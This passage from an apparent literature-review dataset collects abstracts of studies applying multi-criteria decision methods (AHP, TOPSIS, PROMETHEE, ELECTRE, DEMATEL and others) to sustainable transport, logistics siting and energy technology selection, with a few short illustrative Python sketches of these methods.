sustainability parameters. A composite sustainability index is introduced as a decision support tool for transportation policymaking, where the sustainability index considers multidimensional conflicting criteria in the transportation planning process. The proposed framework should help decision-makers with incorporating sustainability considerations into transportation planning as well as identifying the most sustainable (or least unsustainable) plan for predetermined objectives. 
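One of the entries above evaluates cross-country transport sustainability with a modified ELECTRE method by establishing pairwise outranking relations between countries and extracting a core subset of better-performing ones. The sketch below shows only the basic ELECTRE I concordance/discordance step on a hypothetical, already-normalised decision matrix; the data, weights and thresholds are invented for illustration, and the discordance index is a simplified textbook variant rather than the modification proposed in the cited paper.

```python
import numpy as np

# Hypothetical decision matrix: rows = countries, columns = benefit-type criteria scaled to [0, 1].
X = np.array([[0.8, 0.6, 0.7],
              [0.5, 0.9, 0.6],
              [0.6, 0.4, 0.9]])
w = np.array([0.5, 0.3, 0.2])           # assumed criteria weights, summing to 1

n = len(X)
C = np.zeros((n, n))                     # concordance matrix
D = np.zeros((n, n))                     # discordance matrix
for i in range(n):
    for j in range(n):
        if i == j:
            continue
        C[i, j] = w[X[i] >= X[j]].sum()                      # weight of criteria where i is at least as good as j
        gap = np.abs(X[i] - X[j]).max()
        D[i, j] = max((X[j] - X[i]).max(), 0.0) / gap if gap > 0 else 0.0

c_hat, d_hat = 0.6, 0.4                  # assumed concordance / discordance thresholds
outranks = (C >= c_hat) & (D <= d_hat)   # True where alternative i outranks alternative j
np.fill_diagonal(outranks, False)
print(outranks)
```

Alternatives that are not outranked by any other form the kernel, i.e. the kind of core subset of better-performing countries referred to in that abstract.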
--- paper_title: Strategic Transport Management Models—The Case Study of an Oil Industry paper_content: The awareness of the need to preserve the environment and establish sustainable development evolved as the result of the development of the world economy and society. Transport plays a very important role in this process. It is recognized as one of the main factors in sustainable development strategy. Strategic transport management model is presented in this paper. It represents a comprehensive and complete strategic management process, beginning from the strategic analysis, then strategy formulation and its implementation to strategic control. What makes this model specific is the development of its phases using contemporary strategic management methods and MCDM (Multicriteria Decision Making) techniques. In this way, subjectivity is avoided and the decision-making process is impartial. To formulate sustainable transport strategy, the authors use a SWOT analysis (Strengths, Weaknesses, Opportunities, and Threats) and the fuzzy Delphi method as the basis to evaluate impact factors. Fuzzy SWOT analysis is applied to formulate strategic options and the selection of optimal option is realized through DEMATEL (Decision-Making Trial and Evaluation Laboratory)-based ANP (Analytic Network Process). The strategic transport management model is applied to Serbian Oil Industry (NIS) as a company engaged in the production and transport of oil and oil derivatives. The results presented in this paper have shown that this model can be successfully implemented in profit organizations. It also can be used to formulate strategies on the basis of scientific principles and create conditions for successful sustainable strategies implementation. --- paper_title: Development of a multi-criteria assessment model for ranking of renewable and non-renewable transportation fuel vehicles paper_content: Several factors, including economical, environmental, and social factors, are involved in selection of the best fuel-based vehicles for road transportation. This leads to a multi-criteria selection problem for multi-alternatives. In this study, a multi-criteria assessment model was developed to rank different road transportation fuel-based vehicles (both renewable and non-renewable) using a method called Preference Ranking Organization Method for Enrichment and Evaluations (PROMETHEE). This method combines qualitative and quantitative criteria to rank various alternatives. In this study, vehicles based on gasoline, gasoline–electric (hybrid), E85 ethanol, diesel, B100 biodiesel, and compressed natural gas (CNG) were considered as alternatives. These alternatives were ranked based on five criteria: vehicle cost, fuel cost, distance between refueling stations, number of vehicle options available to the consumer, and greenhouse gas (GHG) emissions per unit distance traveled. In addition, sensitivity analyses were performed to study the impact of changes in various parameters on final ranking. Two base cases and several alternative scenarios were evaluated. In the base case scenario with higher weight on economical parameters, gasoline-based vehicle was ranked higher than other vehicles. In the base case scenario with higher weight on environmental parameters, hybrid vehicle was ranked first followed by biodiesel-based vehicle. 
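The preceding entry ranks fuel-based vehicles with PROMETHEE. A compact sketch of the PROMETHEE II net-flow computation is given below; it uses the simple "usual" preference function and hypothetical scores and weights (cost-type criteria are negated so that larger values are always better), so it only illustrates the mechanics, not the criteria values or results of the cited study.

```python
import numpy as np

# Hypothetical evaluation table: rows = vehicle alternatives, columns = criteria.
# Cost-type criteria (columns 0 and 1) are negated so that "larger is better" holds everywhere.
X = np.array([[-24000.0, -0.06, 3.0],
              [-28000.0, -0.04, 5.0],
              [-21000.0, -0.07, 2.0]])
w = np.array([0.4, 0.4, 0.2])            # assumed criteria weights, summing to 1

def usual_preference(d):
    """Usual (step) preference function: full preference as soon as the difference is positive."""
    return (d > 0).astype(float)

n = len(X)
pi = np.zeros((n, n))                    # aggregated preference index pi(a_i, a_j)
for i in range(n):
    for j in range(n):
        if i != j:
            pi[i, j] = np.dot(w, usual_preference(X[i] - X[j]))

phi_plus = pi.sum(axis=1) / (n - 1)      # positive (leaving) flow
phi_minus = pi.sum(axis=0) / (n - 1)     # negative (entering) flow
phi = phi_plus - phi_minus               # PROMETHEE II net flow
print("net flows:", phi.round(3), "-> ranking (best first):", np.argsort(-phi))
```

In a fuller implementation the step function would typically be replaced by one of the other generalized criteria (linear, V-shape, Gaussian) with indifference and preference thresholds per criterion.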
--- paper_title: Integration of Sustainability Issues in Strategic Transportation Planning: A Multi-criteria Model for the Assessment of Transport Infrastructure Plans paper_content: Past decades have witnessed significant advances in transportation planning methodologies, facilitated by the development of computational algorithms, technologies, and spatial modeling tools such as geographical information systems (GIS) and decision support systems (DSS). However, at strategic planning levels, a commonly accepted assessment model integrating the sustainability paradigm is still lacking. This work presents a novel contribution to this research line, with the proposal of a multi-criteria assessment model embedded in a GIS. The criteria have been designed covering the 3 dimensions of sustainability: economic, social, and environmental. This assessment model constitutes an interdisciplinary approach tightly linking network analysis, spatial geography, regional economics, and environmental issues in a GIS-based computer framework. The validity of the methodology is tested with its application in a case study: the extension of the high speed rail network included in the Spanish Transport and Infrastructure Plan 2005-2020. --- paper_title: Location selection of city logistics centers under sustainability paper_content: City Logistics Centers (CLC) are an important part of the modern urban logistics system, and the selection of the location of a CLC has become a key problem in logistics and supply chain management. Integrating the economic, environmental, and social dimensions of sustainable development, this paper presents a new evaluation system for the location selection of a CLC from a sustainability perspective. A fuzzy multi-attribute group decision making (FMAGDM) technique based on a linguistic 2-tuple is used to evaluate potential alternative CLC locations. In this method, the linguistic evaluation values of all the evaluation criteria are transformed into linguistic 2-tuples. A new 2-tuple hybrid ordered weighted averaging (THOWA) operator is presented to aggregate the overall evaluation values of all experts into a collective evaluation value for each alternative, which is then used to rank and select alternative CLC locations. An application example is provided to validate the method developed and to highlight its implementation, practicality, and effectiveness by comparing with the fuzzy Technique for Order of Preference by Similarity to Ideal Solution (TOPSIS) method. --- paper_title: Application of fuzzy TOPSIS in evaluating sustainable transportation systems paper_content: Sustainable transportation systems are the need of modern times. There has been an unexpected growth in the number of transportation activities over the years and the trend is expected to continue in the coming years. This has obvious associated environmental costs, such as air pollution and noise, which are degrading the quality of life in modern cities. To cope with this crisis, municipal administrations are investing in sustainable transportation systems that are not only efficient, robust and economical but also friendly towards the environment. The challenge before the transportation decision makers is how to evaluate and select such sustainable transportation systems. In this paper, we present a multicriteria decision making approach for selecting sustainable transportation systems under partial or incomplete information (uncertainty). The proposed approach comprises three steps.
In step 1, we identify the criteria for sustainability assessment of transportation. In step 2, experts provide linguistic ratings to the potential alternatives against the selected criteria. Fuzzy TOPSIS is used to generate aggregate scores for sustainability assessment and selection of the best alternative. In step 3, sensitivity analysis is performed to determine the influence of criteria weights on the decision-making process. A numerical illustration is provided to demonstrate the applicability of the approach. The strength of the proposed work is its practical applicability and the ability to generate good quality solutions under uncertainty. --- paper_title: Proposed framework for sustainability screening of urban transport projects in developing countries: A case study of Accra, Ghana paper_content: This paper documents a framework suggested for screening urban transport projects in developing countries to reflect local issues relevant to sustainability. The framework is based on the integration of indigenous and scientific knowledge to reflect the sustainability of candidate projects. This is achieved through a participatory approach to integrate inputs from system users and providers to produce a term defined as the Localized Sustainability Score (LSS). The LSS values of the projects are then used to produce a relative ranking of potential projects, for use as a decision support for project screening and selection. Proof-of-concept development of the proposed LSS framework is presented via a preliminary case study in Accra, Ghana, and the results indicate that the framework adequately represented local sustainable transport needs, priorities and perceptions. The LSS determined for some selected projects maintained the original relative rankings that were already derived using conventional methods. The LSS also has the added advantage of evaluating projects of different scales, which were not easy to evaluate together by conventional methods. --- paper_title: An analytic hierarchy process model to evaluate road section design paper_content: Abstract The traffic system is as essential to modern society as the circulatory system to the human body. Road section design is therefore a key infrastructure activity for economic development, and multi-criteria decision-making can provide an interdisciplinary approach that moves beyond purely economic optimisation to include technological, technical and ecological factors. The present work describes applying the multi-criteria Analytical Hierarchy Process (AHP) method to evaluate road section design in an urban environment through differential weighting of various criteria and sub-criteria. The model is tested on a stretch of National Road D8 in the municipality of Podstrana near the city of Split (Croatia), which serves as an important route for commuters and tourists. The proposed AHP model provided reliable results that were robust to sensitivity analysis. This approach involving differential criterion weighting may prove useful for evaluating and selecting appropriate road section designs for this ... --- paper_title: Multi‐criteria decision making support tool for freight integrators: Selecting the most sustainable alternative paper_content: Sustainable development has turned into a daily concept by now. Similarly, sustainable transport also appears increasingly often, primarily in transport policy and strategic plans.
However, it would be equally important to apply this aspect to specific activities, such as haulage and forwarding, that are a part of transport. Today, forwarders select an optimal alternative concerning only the criteria related to the economic effectiveness of the transport task. In many cases, shippers are aware neither of the concept of sustainable transport nor of the harmful effects they generate. Hence, although there is a concept of ‘freight integrator’, only very few are able to meet the requirements laid down for it. No widespread method has been developed yet to compare transportation options. A similar situation can be faced when comparing a traditional, purely economic approach with a theoretical modern aspect that would be in accordance with the principles of sustainable transport. The model that was developed at the Department of Aircraft and Ships of Budapest University of Technology and Economics was designed specifically to compare various options in terms of sustainability. The indicators used as the elements of decision-making criteria applied in the model were derived from the indicators used for assessing the transport sector but modified according to the requirements of the decision-making task for a freight integrator. Finally, the sustainable performance index of the alternatives, a ‘fineness index’, is determined by two fundamentally different aggregation methods. This article presents the model structure and application using a concrete example. --- paper_title: A new fuzzy additive ratio assessment method (ARAS‐F). Case study: The analysis of fuzzy multiple criteria in order to select the logistic centers location paper_content: Abstract The main approaches which are applied to select the logistic center are the methods of gravity center, analytic hierarchy process, similarity to ideal solution, fuzzy ranking, assessment, etc. Multiple Criteria Decision‐Making (MCDM) combines analytical and inductive knowledge, describing a domain problem, which can be fuzzy and/or incomplete. The fuzzy MCDM (FMCDM) approach can explain the problem more appropriately. The purpose of the paper is to select the most suitable site for a logistic centre among a set of alternatives, to help the stakeholders with the performance evaluation in an uncertain environment, where the subjectivity and vagueness of criteria are described by triangular fuzzy numbers. The paper presents a newly‐developed ARAS‐F method to solve different problems in transport, construction, economics, technology and sustainable development. --- paper_title: New hybrid multi-criteria decision-making DEMATEL-MAIRCA model: sustainable selection of a location for the development of multimodal logistics centre paper_content: Abstract The paper describes the application of a new multi-criteria decision-making (MCDM) model, MultiAttributive Ideal-Real Comparative Analysis (MAIRCA), used to select a location for the development of a multimodal logistics centre by the Danube River. The MAIRCA method is based on the comparison of theoretical and empirical alternative ratings. Relying on theoretical and empirical ratings, the gap (distance) between the empirical and ideal alternative is defined. To determine the weight coefficients of the criteria, the DEMATEL method was applied. In this paper, through a sensitivity analysis, the results of MAIRCA and other MCDM methods – MOORA, TOPSIS, ELECTRE, COPRAS and PROMETHEE – were compared.
The analysis showed that a smaller or bigger instability in alternative rankings appears in MOORA, TOPSIS, ELECTRE and COPRAS. On the other hand, the analysis showed that MAIRCA and PROMETHEE offer consistent solutions and have a stable and well-structured analytical framework for ranking the alternatives.... --- paper_title: An integrated MCDM approach considering demands-matching for reverse logistics paper_content: Abstract Reverse logistics (RL) has been regarded as a key driving force for remanufacturing. However, there are great uncertainties in terms of quality and quantity of used components for RL. There are also complexities in suppliers and operations. These make decision-making of RL very complex. In order to identify the best collection mode for used components, a demand-matching oriented Multiple Criteria Decision Making (MCDM) method is established. In this method, the damage level and remaining service life are firstly incorporated into the evaluation criteria of reuse modes, then a hybrid method (AHP-EW) that integrates Analytic Hierarchy Process (AHP) and Entropy Weight (EW) method is applied to derive criteria weights and the grey Multi-Attributive Border Approximation Area Comparison (MABAC) is adopted to rank the collection modes. Finally, sensitivity analysis is implemented to test the stability of the proposed method, and a demands-matching method is proposed to validate and evaluate the feasibility of the optimal alternative. The collection of used pressurizers is taken as case study to validate the applicability of the proposed model. The results showed the effectiveness of the proposed method in MCDM of RL. --- paper_title: Using a Novel Grey DANP Model to Identify Interactions between Manufacturing and Logistics Industries in China paper_content: As a crucial part of producer services, the logistics industry is highly dependent on the manufacturing industry. In general, the interactive development of the logistics and manufacturing industries is essential. Due to the existence of a certain degree of interdependence between any two factors, interaction between the two industries has produced a basis for measurement; identifying the key factors affecting the interaction between the manufacturing and logistics industries is a kind of decision problem in the field of multiple criteria decision making (MCDM). A hybrid MCDM method, DEMATEL-based ANP (DANP) is appropriate to solve this problem. However, DANP uses a direct influence matrix, which involves pairwise comparisons that may be more or less influenced by the respondents. Therefore, we propose a decision model, Grey DANP, which can automatically generate the direct influence matrix. Statistical data for the logistics and manufacturing industries in the China Statistical Yearbook (2006–2015) were used to identify the key factors for interaction between these two industries. The results showed that the key logistics criteria for interaction development are the total number of employees in the transport business, the volume of goods, and the total length of routes. The key manufacturing criteria for interaction development are the gross domestic product and the value added. Therefore, stakeholders should increase the number of employees in the transport industry and freight volumes. Also, the investment in infrastructure should be increased. 
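As an aside on the AHP-EW hybrid described in the reverse-logistics entry above, the objective entropy-weight (EW) step can be illustrated with a short sketch. The following Python snippet is a minimal illustration, not code from the cited study; the decision matrix, the three criteria and the assumption that all criteria are benefit-type are invented for the example.

```python
import numpy as np

def entropy_weights(X):
    """Objective criteria weights via Shannon entropy.

    X: (m alternatives x n criteria) matrix of non-negative benefit scores.
    Returns a weight vector summing to 1; criteria whose values vary more
    across alternatives (lower entropy) receive larger weights.
    """
    X = np.asarray(X, dtype=float)
    m, n = X.shape
    # Column-normalise so each criterion forms a probability distribution.
    P = X / X.sum(axis=0)
    # Shannon entropy per criterion (0 * log 0 treated as 0).
    with np.errstate(divide="ignore", invalid="ignore"):
        logP = np.where(P > 0, np.log(P), 0.0)
    e = -(P * logP).sum(axis=0) / np.log(m)
    d = 1.0 - e                      # degree of divergence per criterion
    return d / d.sum()

if __name__ == "__main__":
    # Hypothetical collection-mode alternatives scored on three benefit criteria.
    X = [[0.7, 120, 3.2],
         [0.9,  90, 2.8],
         [0.6, 150, 3.9]]
    print("entropy weights:", np.round(entropy_weights(X), 3))
```

In a hybrid AHP-EW scheme these objective weights would then be combined (for example, multiplied and renormalised) with subjective AHP weights; that combination rule is study-specific and not shown here.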
--- paper_title: ELASTIC – A methodological framework for identifying and selecting sustainable transport indicators paper_content: There is significant reliance on sustainable transport indicators for monitoring and reporting progress towards sustainable transport. The selection of appropriate sustainability indicators presents a number of challenges however, not least because of the vast number of potential indicators available. To help address these challenges, this paper presents the Evaluative and Logical Approach to Sustainable Transport Indicator Compilation (ELASTIC) – a framework for identifying and selecting a small subset of sustainable transport indicators. ELASTIC is demonstrated with an application to the English Regions, UK. --- paper_title: Incorporating sustainability assessment in transportation planning: an urban transportation vehicle-based approach paper_content: Abstract Environmental assessments are on the critical path for the development of land, infrastructure and transportation systems. These assessments are based on planning methods which, in turn, are subject to continuous enhancement. The substantial impacts of transportation on environment, society and economy strongly urge the incorporation of sustainability into transportation planning. Two major developments that enhance transportation sustainability are new fuels and vehicle power systems. Traditional planning ignores technology including the large differences among conventional, hybrid and alternative fuel vehicles and buses. The introduction of alternative fuel vehicles is likely to change the traditional transportation planning process because different characteristics need to be taken into account. In this study a sustainability framework is developed that enables assessment of transportation vehicle characteristics. Identified indicators are grouped in five sustainability dimensions (Environment,... --- paper_title: Setting the weights of sustainability criteria for the appraisal of transport projects paper_content: Although the Multi-Criteria Decision Analysis (MCDA) has made progress towards appraising and measuring the performance of smart and sustainable transport projects, it still has important issues that need to be addressed such as the problem associated with incomparable quantities, the inherent subjective qualitative assessment, the complexity of identifying impacts to be included and its measurement method, and the corresponding weights. The issue of trading-off different sustainability criteria is the main unresolved matter. This problem may lead to a lack of accuracy in the decision making process. This paper presents a new methodology to set the weights of the sustainability criteria used in the MCDA in order to reduce subjectivity and imprecision. We suggest eliciting criteria weights based on both expert preferences and the importance that the sustainability criteria have in the geographical and social context where the project is developed. This novel methodology is applied to a real case study to quantify sustainable practices associated with the design and construction of a new roadway in Spain. The outcome demonstrates that the approach to the weighting problem has significance and general application in a multi-criteria evaluation process. --- paper_title: Prioritizing sustainable electricity production technologies: MCDM approach paper_content: Economic, technological, social, and political developments stressed the need for shifts in energy-mix.
Therefore it is important to provide a rationale for sustainable decision making in energy policy. The aim of this paper is to develop the multi-criteria decision support framework for choosing the most sustainable electricity production technologies. Given that the selection of sustainable energy sources involves many conflicting criteria, the multi-criteria decision methods MULTIMOORA and TOPSIS were employed for the analysis. The indicator system covering different approaches of sustainability was established. The analysis proved that the future energy policy should be oriented towards the sustainable energy technologies, namely water and solar thermal ones. It is the proposed multi-criteria assessment framework that can constitute a basis for further sub-regional optimization of sustainable energy policy. --- paper_title: An analytical method for the measurement of energy system sustainability in urban areas paper_content: Assessing the sustainability of urban energy systems and forecasting their development are important topics that have been the focus of recent research. In this paper, an approach for measuring the sustainability of an urban energy system is introduced. The approach is based on prediction of the future energy needs within the consuming sectors of a city by specification of energy system development scenarios and validation of the scenarios by a multi-criteria decision method. Prediction of the energy needs of the city is carried out using the simulation Model for Analysis of the Energy Demands (MAED). At the last level of aggregation, the method of multi-criteria analysis yields the General Index of Sustainability (GIS), which provides a measure of the validity, viability, or quality of the investigated scenarios. In this way, a mathematical and graphical synthesis of all the indicators that are relevant to sustainable development is made. The accuracy in determining the mean of the GIS is checked by calculating the standard deviation. A measure of the reliability of the preference when comparing several consecutive scenarios is also obtained. The defined scenarios take into account the utilization of different energy sources, the exploitation of existing energy plants and infrastructure, and the building of new plants. The sustainability criteria are described by a unique set of economic, social and ecological indicators. The new approach was used to forecast the development of a sustainable energy system in Belgrade, Serbia. --- paper_title: National Options for a Sustainable Nuclear Energy System: MCDM Evaluation Using an Improved Integrated Weighting Approach paper_content: While the prospects look bright for nuclear energy development in China, no consensus about an optimum transitional path towards sustainability of the nuclear fuel cycle has been achieved. Herein, we present a preliminary study of decision making for China’s future nuclear energy systems, combined with a dynamic analysis model. In terms of sustainability assessment based on environmental, economic, and social considerations, we compared and ranked the four candidate options of nuclear fuel cycles combined with an integrated evaluation analysis using the Multi-Criteria Decision Making (MCDM) method. An improved integrated weighting method was first applied in the nuclear fuel cycle evaluation study.
This method synthesizes diverse subjective/objective weighting methods to evaluate conflicting criteria among the competing decision makers at different levels of expertise and experience. The results suggest that the fuel cycle option of direct recycling of spent fuel through fast reactors is the most competitive candidate, while the fuel cycle option of direct disposal of all spent fuel without recycling is the least attractive for China, from a sustainability perspective. In summary, this study provided a well-informed decision-making tool to support the development of national nuclear energy strategies. --- paper_title: A Spatial Decision Support System Framework for the Evaluation of Biomass Energy Production Locations: Case Study in the Regional Unit of Drama, Greece paper_content: Renewable Energy Sources are expected to play a very important role in energy production in the following years. They constitute an energy production methodology which, if properly enabled, can ensure energy sufficiency as well as the protection of the environment. Energy production from biomass in particular is a very common method, which exploits a variety of resources (wood and wood waste, agricultural crops and their by-products after cultivation, animal wastes, Municipal Solid Waste (MSW) and food processing wastes) for the production of energy. This paper presents a Spatial Decision Support System, which enables managers to locate the most suitable areas for biomass power plant installation. For doing this, fuzzy logic and fuzzy membership functions are used for the creation of criteria layers and suitability maps. In this paper, we use a Multicriteria Decision Analysis methodology (Analytical Hierarchy Process) combined with fuzzy system elements for the determination of the weight coefficients of the participating criteria. Then, based on the combination of fuzzy logic and the Analytic Hierarchy Process (AHP), a final proposal is created that divides the area into four categories regarding their suitability for supporting a biomass energy production power plant. For the two optimal locations, the biomass is also calculated. The framework is applied to the Regional Unit of Drama, which is situated in Northern Greece and is very well known for the area’s forest and agricultural production. --- paper_title: A novel integrated decision-making approach for the evaluation and selection of renewable energy technologies paper_content: The decision-making in energy sector involves finding a set of energy sources and conversion devices to meet the energy demands in an optimal way. Making an energy planning decision involves the balancing of diverse ecological, social, technical and economic aspects across space and time. Usually, technical and environmental aspects are represented in the form of multiple criteria and indicators that are often expressed as conflicting objectives. In order to attain higher efficiency in the implementation of renewable energy (RE) systems, the developers and investors have to deploy multi-criteria decision-making techniques. In this paper, a novel hybrid Decision Making Trial and Evaluation Laboratory and analytic network process (DEMATEL-ANP) model is proposed in order to stress the importance of the evaluation criteria when selecting alternative REs and the causal relationships between the criteria.
Finally, complex proportional assessment and weighted aggregated sum product assessment methods are used to assess the performances of the REs with respect to different evaluating criteria. An illustrative example from Costs assessment of sustainable energy systems (CASES) project, financed by European Commission Framework 6 programme (EU FM 6) for EU member states is presented in order to demonstrate the application feasibility of the proposed model for the comparative assessment and ranking of RE technologies. Sensitivity analysis, result validation and critical outcomes are provided as well to offer guidelines for the policy makers in the selection of the best alternative RE with the maximum effectiveness. --- paper_title: Evaluation of renewable power sources using a fuzzy MCDM based on cumulative prospect theory: A case in China paper_content: Abstract Under the global implementation of low-carbon economy, the development of renewable energy becomes an important way of energy saving and emission reduction. Multi-criteria decision-making (MCDM) techniques are gaining popularity in renewable power sources (RPS) evaluation since this process involves many conflicting criteria. Classical MCDM techniques assume that decisions are conducted in a deterministic environment and decision-makers (DMs) are completely rational while facing with investment risks. However, these hypotheses are not supported in the RPS selection. Fortunately, fuzzy set theory enables to cope with vagueness of evaluations in decision-making process, and cumulative prospect theory can reflect the risk preference of DMs and describe the actual behavior of them. Therefore, in this paper, a fuzzy MCDM technique based on cumulative prospect theory is proposed for selecting the most appropriate RPS in China. A case study in China is carried out to illustrate the rationality and feasibility of the proposed method. The results show that the solar PV is determined to be the best one in China, but the optimal alternative is sensitive to the prospect parameters. This research provides insightful information for the public investors with different risk preferences to evaluate the RPS and select the most appropriate one under uncertain environment. --- paper_title: Comparing the sustainability of U.S. electricity options through multi-criteria decision analysis paper_content: Sustainable energy decision-making requires comparing energy options across a wide range of economic, environmental, social and technical implications. However, such comparisons based on quantitative data are currently limited at the national level. This is the first comparison of 13 currently operational renewable and non-renewable options for new US electricity generation using multi-criteria decision analysis with quantitative input values (minimum, nominal, and maximum) for 8 sustainability criteria (levelized cost of energy, life cycle greenhouse gas and criteria air pollutant emissions, land and water use, accident-related fatalities, jobs, and annual capacity factor) and 10 representative decision-maker preference scenarios. Results across several preference scenarios indicate that biopower and geothermal (flash and binary) currently score highest in sustainability for the US. Other renewable energy technologies generally offer substantial sustainability improvements over fossil fuel or nuclear technologies, and nuclear is preferable to fossil fuels in most scenarios. 
The relatively low ranking of natural gas combined cycle in most preference scenarios should encourage caution in adopting NGCC as a “bridge” to renewables. Although NGCC ranks high under economic and technical preference scenarios, renewables actually rank higher in both scenarios (hydro – economic; geothermal and biopower – technical). --- paper_title: Evaluating clean energy alternatives for Jiangsu, China: An improved multi-criteria decision making method paper_content: Promoting the utilization of clean energy has been identified as one potential solution to addressing environmental pollution and achieving sustainable development in many countries around the world. Evaluating clean energy alternatives includes a requirement to balance multiple conflict criteria, including technology, environment, economy and society, all of which are incommensurate and interdependent. Traditional MCDM (multi-criteria decision making) methods, such as the weighted average method, often fail to aggregate such criteria consistently. In this paper, an improved MCDM method based on fuzzy measure and integral is developed and applied to evaluate four primary clean energy options for Jiangsu Province, China. The results confirm that the preferred clean energy option for Jiangsu is solar photovoltaic, followed by wind, biomass and finally nuclear. A sensitivity analysis is also conducted to evaluate the values of clean energy resources for Jiangsu. The ordered weighted average method is also applied to compare the method mentioned above in our empirical study. The results show that the improved MCDM method provides higher discrimination between alternative clean energy alternatives. --- paper_title: Multi-Criteria Analysis of Electricity Generation Scenarios for Sustainable Energy Planning in Pakistan paper_content: The now over a decade-long electricity crisis in Pakistan has adversely affected the socio-economic development of the country. This situation is mainly due to a lack of sustainable energy planning and policy formulation. In this context, energy models can be of great help but only a handful of such efforts have been undertaken in Pakistan. Two key shortcomings pertaining to energy models lead to their low utilization in developing countries. First, the models do not effectively make decisions, but rather provide a set of alternatives based on modeling parameters; and secondly, the complexity of these models is often poorly understood by the decision makers. As such, in this study, the Analytical Hierarchy Process (AHP) methodology of Multi-Criteria Decision-Making (MCDM) has been used for the sustainability assessment of energy modeling results for long-term electricity planning. The four scenario alternatives developed in the energy modeling effort, Reference (REF), Renewable Energy Technologies (RET), Clean Coal Maximum (CCM) and Energy Efficiency and Conservation (EEC), have been ranked using the Expert Choice® tool based on the AHP methodology. The AHP decision support framework of this study revealed the EEC scenario as the most favorable electricity generation scenario followed by the REF, RET and CCM scenarios. Besides that, this study proposes policy recommendations to undertake integrated energy modeling and decision analysis for sustainable energy planning in Pakistan. 
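Several of the entries above (for example, the AHP-based ranking of Pakistan's electricity generation scenarios) rest on deriving priority weights from pairwise comparison matrices. The sketch below shows one standard way to do this, the principal-eigenvector method with Saaty's consistency ratio; it is a generic illustration, and the pairwise matrix is a hypothetical example rather than data from any cited paper.

```python
import numpy as np

# Saaty's random consistency index for matrices of order 1..9.
RI = {1: 0.0, 2: 0.0, 3: 0.58, 4: 0.90, 5: 1.12, 6: 1.24, 7: 1.32, 8: 1.41, 9: 1.45}

def ahp_weights(A):
    """Priority vector and consistency ratio from a reciprocal pairwise matrix A."""
    A = np.asarray(A, dtype=float)
    n = A.shape[0]
    eigvals, eigvecs = np.linalg.eig(A)
    k = np.argmax(eigvals.real)               # index of the principal eigenvalue
    w = np.abs(eigvecs[:, k].real)
    w = w / w.sum()                           # normalised priority weights
    lam_max = eigvals[k].real
    ci = (lam_max - n) / (n - 1)              # consistency index
    cr = ci / RI[n] if RI[n] > 0 else 0.0     # consistency ratio (accept if < 0.10)
    return w, cr

if __name__ == "__main__":
    # Hypothetical pairwise comparisons of four scenario-evaluation criteria.
    A = [[1,   3,   5,   2],
         [1/3, 1,   3,   1/2],
         [1/5, 1/3, 1,   1/4],
         [1/2, 2,   4,   1]]
    w, cr = ahp_weights(A)
    print("weights:", np.round(w, 3), "CR:", round(cr, 3))
```

If the consistency ratio exceeds roughly 0.10, the usual practice is to ask the expert to revise the pairwise judgments before the weights are used further.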
--- paper_title: Location Selection for Wind Farms Using GIS Multi-Criteria Hybrid Model: An Approach Based on Fuzzy and Rough Numbers paper_content: This paper presents spatial mathematical model in order to identify sites for the wind farms installment which can have significant support for the planners in the area of strategy and management of wind power use. The suggested model is based on combined use of Geographical Information Systems (GIS) with multi-criteria techniques of Best-Worst method (BWM) and MultiAttributive Ideal-Real Comparative Analysis (MAIRCA). Rough numbers and fuzzy logic are used to exploit uncertainty during data analysis in spatial mathematical model. The model is applied on the case study. Rough BWM model is used to determine weight coefficients of the criteria and rough MAIRCA method is used to rank separated sustainable locations. The implementation of MAIRCA method has shown that the location L3 is the most suitable for the wind farm in the area covered in the case study. Therefore, the suggested spatial mathematical model can be successfully used to identify the potential suitable sites for the wind farms in other areas with similar geographic conditions. --- paper_title: Optimal site selection of electric vehicle charging station by using fuzzy TOPSIS based on sustainability perspective paper_content: Selecting the most sustainable site plays an important role in the life cycle of electric vehicle charging station (EVCS), which needs to consider some conflicting criteria. Different from the previous studies which mostly utilize programming (optimization) models, this paper employed a multi-criteria decision-making (MCDM) method to consider some subjective but important criteria for EVCS site selection. To reflect the ambiguity and vagueness due to the subjective judgments of decision makers, fuzzy TOPSIS method was applied to select the optimal EVCS site. Based on academic literatures, feasibility research reports and expert opinions in different fields, the evaluation index system for EVCS site selection was built from sustainability perspective, which consists of environmental, economic and social criteria associated with a total of 11 sub-criteria. Then, the criteria performances of different alternatives and criteria weights were judged by five groups of expert panels in the fields of environment, economy, society, electric power system and transportation system. Finally, the EVCS site alternatives were ranked by employing fuzzy TOPSIS method. The result shows EVCS site A2 located at Changping district in Beijing obtains the highest ranking score and should be selected as the optimal site. Meanwhile, the environmental and social criteria are paid more attentions from decision makers than economic criteria. The sensitivity analysis results indicate the alternative A2 always secures its top ranking no matter how sub-criteria weights change. It is effective and robust to apply fuzzy TOPSIS method into EVCS site selection. This paper provides a new research perspective for site selection and also extends the application domains of fuzzy TOPSIS method. --- paper_title: Applicability of multicriteria decision aid to sustainable hydropower paper_content: EU directives RESD (2001/77/EC) and WFD (2000/60/EC) can be considered as partially conflicting. 
Achieving a good qualitative and quantitative status of waters, which presumes the “non-deterioration principle” of the existing ecological status in line with the WFD, conflicts with the construction of new hydropower plants that promote renewable energies, which is in line with the RESD. --- paper_title: Energy project performance evaluation with sustainability perspective paper_content: Energy is a means of economic development by raising living standards and reducing poverty. Electricity production is a vital process for households, industries and commercial activities. No two power plants are alike; they may vary in technology, size, cost, environmental aspects etc., so that evaluations shall be made on a project basis, rather than by technology. Evaluation of the best energy project among many alternatives is a complex problem which cannot be simplified to economic feasibility only, requiring investors to also consider environmental and social circumstances. This paper proposes a novel method with a sustainability perspective for better selecting concretely defined energy projects. This method is based on two multi-criteria decision making (‘MCDM’) techniques; AHP for determining the importance weights of evaluation criteria and VIKOR for ranking energy project alternatives. The work differentiates itself in its emphasis on analyzing actual projects instead of generic energy technologies, its consideration of similar project scales, and the use of Group Decision Making (‘GDM’) for aggregating expert opinions. The applicability of the method is demonstrated on a case study from Turkey, where one thermal power and three renewable energy projects are compared and ranked analytically. --- paper_title: Sustainability assessment of electricity generation technologies using weighted multi-criteria decision analysis paper_content: Solving the issue of environmental degradation due to the expansion of the World's energy demand requires a balanced approach. The aim of this paper is to comprehensively rank a large number of electricity generation technologies based on their compatibility with the sustainable development of the industry. The study is based on a set of 10 sustainability indicators which provide a life cycle analysis of the plants. The technologies are ranked using a weighted sum multi-attribute utility method. The indicator weights were established through a survey of 62 academics from the fields of energy and environmental science. Our results show that large hydroelectric projects are the most sustainable technology type, followed by small hydro, onshore wind and solar photovoltaic. We argue that political leaders should have a more structured and strategic approach in implementing sustainable energy policies and this type of research can provide arguments to support such decisions. --- paper_title: A Novel Approach for the Selection of 